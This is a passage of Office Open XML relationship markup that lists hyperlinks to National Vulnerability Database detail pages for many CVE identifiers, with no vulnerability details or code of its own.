Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId1390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId1391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId1392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78464" TargetMode="External" Id="rId1393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId1394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId1395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81389" TargetMode="External" Id="rId1396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId1397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId1398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId1399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId1400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85594" TargetMode="External" Id="rId1401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15613" TargetMode="External" Id="rId1402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15417" TargetMode="External" Id="rId1403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15933" TargetMode="External" Id="rId1404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18401" TargetMode="External" Id="rId1405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21098" TargetMode="External" Id="rId1406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39892" TargetMode="External" Id="rId1407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42039" TargetMode="External" Id="rId1408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52873" TargetMode="External" Id="rId1409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54272" TargetMode="External" Id="rId1410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55758" TargetMode="External" Id="rId1411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69092" TargetMode="External" Id="rId1412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69198" TargetMode="External" Id="rId1413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69248" TargetMode="External" Id="rId1414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70611" TargetMode="External" Id="rId1415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71313" TargetMode="External" Id="rId1416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73848" TargetMode="External" Id="rId1417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74871" TargetMode="External" Id="rId1418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75135" TargetMode="External" Id="rId1419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75136" TargetMode="External" Id="rId1420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75137" TargetMode="External" Id="rId1421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78325" TargetMode="External" Id="rId1422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82398" TargetMode="External" Id="rId1423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83611" TargetMode="External" Id="rId1424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84309" TargetMode="External" Id="rId1425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84697" TargetMode="External" Id="rId1426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84968" TargetMode="External" Id="rId1427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86188" TargetMode="External" Id="rId1428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86431" TargetMode="External" Id="rId1429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8794" TargetMode="External" Id="rId1430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88884" TargetMode="External" Id="rId1431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15927" TargetMode="External" Id="rId1432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18796" TargetMode="External" Id="rId1433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47763" TargetMode="External" Id="rId1434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49349" TargetMode="External" Id="rId1435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53196" TargetMode="External" Id="rId1436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65812" TargetMode="External" Id="rId1437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67352" TargetMode="External" Id="rId1438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68833" TargetMode="External" Id="rId1439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69415" TargetMode="External" Id="rId1440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69490" TargetMode="External" Id="rId1441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69566" TargetMode="External" Id="rId1442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71329" TargetMode="External" Id="rId1443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71348" TargetMode="External" Id="rId1444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71349" TargetMode="External" Id="rId1445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71350" TargetMode="External" Id="rId1446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72985" TargetMode="External" Id="rId1447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72999" TargetMode="External" Id="rId1448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76227" TargetMode="External" Id="rId1449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77892" TargetMode="External" Id="rId1450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78451" TargetMode="External" Id="rId1451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78579" TargetMode="External" Id="rId1452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83545" TargetMode="External" Id="rId1453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84896" TargetMode="External" Id="rId1454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84899" TargetMode="External" Id="rId1455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84931" TargetMode="External" Id="rId1456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85456" TargetMode="External" Id="rId1457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85678" TargetMode="External" Id="rId1458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48121" TargetMode="External" Id="rId1459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5522" TargetMode="External" Id="rId1460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69350" TargetMode="External" Id="rId1461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69373" TargetMode="External" Id="rId1462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69449" TargetMode="External" Id="rId1463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70594" TargetMode="External" Id="rId1464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71339" TargetMode="External" Id="rId1465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72935" TargetMode="External" Id="rId1466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72948" TargetMode="External" Id="rId1467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78625" TargetMode="External" Id="rId1468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78630" TargetMode="External" Id="rId1469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85981" TargetMode="External" Id="rId1470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9176" TargetMode="External" Id="rId1471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19201" TargetMode="External" Id="rId1472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69469" TargetMode="External" Id="rId1473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70593" TargetMode="External" Id="rId1474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70602" TargetMode="External" Id="rId1475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78545" TargetMode="External" Id="rId1476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78550" TargetMode="External" Id="rId1477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-9355" TargetMode="External" Id="rId1478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14470" TargetMode="External" Id="rId1479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15154" TargetMode="External" Id="rId1480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17259" TargetMode="External" Id="rId1481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17273" TargetMode="External" Id="rId1482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17443" TargetMode="External" Id="rId1483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17444" TargetMode="External" Id="rId1484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17622" TargetMode="External" Id="rId1485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17631" TargetMode="External" Id="rId1486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18076" TargetMode="External" Id="rId1487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18078" TargetMode="External" Id="rId1488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18887" TargetMode="External" Id="rId1489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19299" TargetMode="External" Id="rId1490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19301" TargetMode="External" Id="rId1491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19302" TargetMode="External" Id="rId1492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19645" TargetMode="External" Id="rId1493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2377" TargetMode="External" Id="rId1494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41607" TargetMode="External" Id="rId1495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42041" TargetMode="External" Id="rId1496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44766" TargetMode="External" Id="rId1497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46370" TargetMode="External" Id="rId1498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46371" TargetMode="External" Id="rId1499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48093" TargetMode="External" Id="rId1500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48786" TargetMode="External" Id="rId1501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49466" TargetMode="External" Id="rId1502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52733" TargetMode="External" Id="rId1503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53583" TargetMode="External" Id="rId1504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54732" TargetMode="External" Id="rId1505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54738" TargetMode="External" Id="rId1506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55545" TargetMode="External" Id="rId1507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55549" TargetMode="External" Id="rId1508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55618" TargetMode="External" Id="rId1509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55855" TargetMode="External" Id="rId1510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56818" TargetMode="External" Id="rId1511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57822" TargetMode="External" Id="rId1512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58649" TargetMode="External" Id="rId1513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59903" TargetMode="External" Id="rId1514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62762" TargetMode="External" Id="rId1515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62801" TargetMode="External" Id="rId1516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63667" TargetMode="External" Id="rId1517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63669" TargetMode="External" Id="rId1518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64918" TargetMode="External" Id="rId1519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68898" TargetMode="External" Id="rId1520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69267" TargetMode="External" Id="rId1521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69297" TargetMode="External" Id="rId1522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69361" TargetMode="External" Id="rId1523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69374" TargetMode="External" Id="rId1524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69375" TargetMode="External" Id="rId1525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69395" TargetMode="External" Id="rId1526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69409" TargetMode="External" Id="rId1527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69497" TargetMode="External" Id="rId1528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69624" TargetMode="External" Id="rId1529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69626" TargetMode="External" Id="rId1530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69636" TargetMode="External" Id="rId1531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69719" TargetMode="External" Id="rId1532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69734" TargetMode="External" Id="rId1533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69781" TargetMode="External" Id="rId1534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69839" TargetMode="External" Id="rId1535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69855" TargetMode="External" Id="rId1536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70019" TargetMode="External" Id="rId1537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70429" TargetMode="External" Id="rId1538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70491" TargetMode="External" Id="rId1539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70493" TargetMode="External" Id="rId1540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71437" TargetMode="External" Id="rId1541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72739" TargetMode="External" Id="rId1542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72938" TargetMode="External" Id="rId1543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72939" TargetMode="External" Id="rId1544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72942" TargetMode="External" Id="rId1545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72956" TargetMode="External" Id="rId1546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72974" TargetMode="External" Id="rId1547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72975" TargetMode="External" Id="rId1548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72977" TargetMode="External" Id="rId1549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75509" TargetMode="External" Id="rId1550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75880" TargetMode="External" Id="rId1551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76968" TargetMode="External" Id="rId1552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76971" TargetMode="External" Id="rId1553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77911" TargetMode="External" Id="rId1554" /><Relationship 